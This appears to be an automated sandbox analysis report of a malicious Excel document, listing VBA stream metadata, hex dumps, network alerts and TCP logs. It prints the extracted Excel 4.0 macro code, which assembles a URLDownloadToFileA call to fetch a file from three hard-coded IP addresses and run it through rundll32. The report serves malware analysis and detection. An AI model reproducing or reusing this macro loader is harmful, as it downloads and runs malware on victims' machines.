                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                "Blasr"
                                                                                                                                                Application.Run
                                                                                                                                                Attribute
                                                                                                                                                Auto_Open()
                                                                                                                                                VB_Name
                                                                                                                                                Private
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Briks.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Briks
                                                                                                                                                VBA File Name:Briks.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                "Briks"
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Byutut.bas, Stream Size: 1056
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Byutut
                                                                                                                                                VBA File Name:Byutut.bas
                                                                                                                                                Stream Size:1056
                                                                                                                                                Data ASCII:. . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                "Byutut"
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class1.cls, Stream Size: 1151
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class1
                                                                                                                                                VBA File Name:Class1.cls
                                                                                                                                                Stream Size:1151
                                                                                                                                                Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class2.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class2
                                                                                                                                                VBA File Name:Class2.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class3.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class3
                                                                                                                                                VBA File Name:Class3.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Kikide.cls, Stream Size: 1249
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Kikide
                                                                                                                                                VBA File Name:Kikide.cls
                                                                                                                                                Stream Size:1249
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                "Kikide"
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: UserForm1.frm, Stream Size: 1526
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/UserForm1
                                                                                                                                                VBA File Name:UserForm1.frm
                                                                                                                                                Stream Size:1526
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Vrest.bas, Stream Size: 679
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Vrest
                                                                                                                                                VBA File Name:Vrest.bas
                                                                                                                                                Stream Size:679
                                                                                                                                                Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Attribute
                                                                                                                                                "Vrest"
                                                                                                                                                VB_Name
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Vsewd.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Vsewd
                                                                                                                                                VBA File Name:Vsewd.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                "Vsewd"
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code

                                                                                                                                                Streams

                                                                                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECT
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:856
                                                                                                                                                Entropy:5.31019504221
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4
                                                                                                                                                Data Raw:49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77
                                                                                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 209
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECTwm
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:209
                                                                                                                                                Entropy:3.32661660177
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
                                                                                                                                                Data Raw:4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43
                                                                                                                                                Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/\x1CompObj
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:97
                                                                                                                                                Entropy:3.61064918306
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/\x3VBFrame
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:266
                                                                                                                                                Entropy:4.62034133633
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                                                Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                                                Stream Path: UserForm1/f, File Type: data, Stream Size: 38
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/f
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:38
                                                                                                                                                Entropy:1.54052096453
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: UserForm1/o, File Type: empty, Stream Size: 0
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/o
                                                                                                                                                File Type:empty
                                                                                                                                                Stream Size:0
                                                                                                                                                Entropy:0.0
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:
                                                                                                                                                Data Raw:
                                                                                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:4263
                                                                                                                                                Entropy:4.38205341073
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                Stream Path: VBA/dir, File Type: data, Stream Size: 1024
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/dir
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:1024
                                                                                                                                                Entropy:6.73319737871
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                Data Raw:01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                Macro 4.0 Code

                                                                                                                                                ,,"=CONCATENATE(AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,,"=""http://185.183.99.115/""",,,=HALT(),,,"=""http://51.89.73.159/""",,,,,,"=""http://190.14.37.38/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
                                                                                                                                                "=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
                                                                                                                                                ,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                05/04/21-19:14:20.510547TCP1201ATTACK-RESPONSES 403 Forbidden8049165185.183.99.115192.168.2.22
                                                                                                                                                05/04/21-19:14:20.760038TCP1201ATTACK-RESPONSES 403 Forbidden804916651.89.73.159192.168.2.22
                                                                                                                                                05/04/21-19:14:21.980632TCP1201ATTACK-RESPONSES 403 Forbidden8049167190.14.37.38192.168.2.22

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                May 4, 2021 19:20:11.099734068 CEST4971780192.168.2.3185.183.99.115
                                                                                                                                                May 4, 2021 19:20:11.168426037 CEST8049717185.183.99.115192.168.2.3
                                                                                                                                                May 4, 2021 19:20:11.168550014 CEST4971780192.168.2.3185.183.99.115
                                                                                                                                                May 4, 2021 19:20:11.169095993 CEST4971780192.168.2.3185.183.99.115
                                                                                                                                                May 4, 2021 19:20:11.240216970 CEST8049717185.183.99.115192.168.2.3
                                                                                                                                                May 4, 2021 19:20:11.465409994 CEST8049717185.183.99.115192.168.2.3
                                                                                                                                                May 4, 2021 19:20:11.465662003 CEST4971780192.168.2.3185.183.99.115
                                                                                                                                                May 4, 2021 19:20:11.472161055 CEST4971880192.168.2.351.89.73.159
                                                                                                                                                May 4, 2021 19:20:11.517227888 CEST804971851.89.73.159192.168.2.3
                                                                                                                                                May 4, 2021 19:20:11.517335892 CEST4971880192.168.2.351.89.73.159
                                                                                                                                                May 4, 2021 19:20:11.517842054 CEST4971880192.168.2.351.89.73.159
                                                                                                                                                May 4, 2021 19:20:11.564810038 CEST804971851.89.73.159192.168.2.3
                                                                                                                                                May 4, 2021 19:20:11.745215893 CEST804971851.89.73.159192.168.2.3
                                                                                                                                                May 4, 2021 19:20:11.745294094 CEST4971880192.168.2.351.89.73.159
                                                                                                                                                May 4, 2021 19:20:11.752038002 CEST4971980192.168.2.3190.14.37.38
                                                                                                                                                May 4, 2021 19:20:11.961822987 CEST8049719190.14.37.38192.168.2.3
                                                                                                                                                May 4, 2021 19:20:11.962018013 CEST4971980192.168.2.3190.14.37.38
                                                                                                                                                May 4, 2021 19:20:11.962588072 CEST4971980192.168.2.3190.14.37.38
                                                                                                                                                May 4, 2021 19:20:12.172132969 CEST8049719190.14.37.38192.168.2.3
                                                                                                                                                May 4, 2021 19:20:12.888844967 CEST8049719190.14.37.38192.168.2.3
